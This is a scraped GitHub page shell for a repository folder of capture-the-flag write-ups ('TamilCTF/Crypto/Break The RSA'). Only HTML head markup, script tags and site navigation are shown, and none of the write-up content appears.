data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script>
<meta name="viewport" content="width=device-width"> <title>CTF-Writeups/TamilCTF/Crypto/Break The RSA at main · 0xM4hm0ud/CTF-Writeups · GitHub</title> <meta name="description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/TamilCTF/Crypto/Break The RSA at main · 0xM4hm0ud/CTF-Writeups" /><meta name="twitter:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta property="og:image:alt" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/TamilCTF/Crypto/Break The RSA at main · 0xM4hm0ud/CTF-Writeups" /><meta property="og:url" content="https://github.com/0xM4hm0ud/CTF-Writeups" /><meta property="og:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B299:3917:1224C57:12E40AF:61830698" data-pjax-transient="true"/><meta name="html-safe-nonce" content="32147c89d8ec6bd146d0f4eb81589b42d71b31f84bfc1a6d36691072d6e49094" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMjk5OjM5MTc6MTIyNEM1NzoxMkU0MEFGOjYxODMwNjk4IiwidmlzaXRvcl9pZCI6Ijg0Mzc5MjA0OTI1NTEzNDE3MjAiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="e12aea8b3c6567d5e8d8d195b54238c2e2bb717baf6defaae9acb0bc1ba1949c" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:391709258" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" />
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/0xM4hm0ud/CTF-Writeups git https://github.com/0xM4hm0ud/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="80924519" /><meta name="octolytics-dimension-user_login" content="0xM4hm0ud" /><meta name="octolytics-dimension-repository_id" content="391709258" /><meta name="octolytics-dimension-repository_nwo" content="0xM4hm0ud/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="391709258" /><meta name="octolytics-dimension-repository_network_root_nwo" content="0xM4hm0ud/CTF-Writeups" />
<link rel="canonical" href="https://github.com/0xM4hm0ud/CTF-Writeups/tree/main/TamilCTF/Crypto/Break%20The%20RSA" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="391709258" data-scoped-search-url="/0xM4hm0ud/CTF-Writeups/search" data-owner-scoped-search-url="/users/0xM4hm0ud/search" data-unscoped-search-url="/search" action="/0xM4hm0ud/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="4xEl2SLINCc1VPft7pfwFVAvt+elUOfG14bp2ThmaA+C6lC2bSkWNbo06C+NVyFACJVFSD5wEjz8bC8chNThuw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
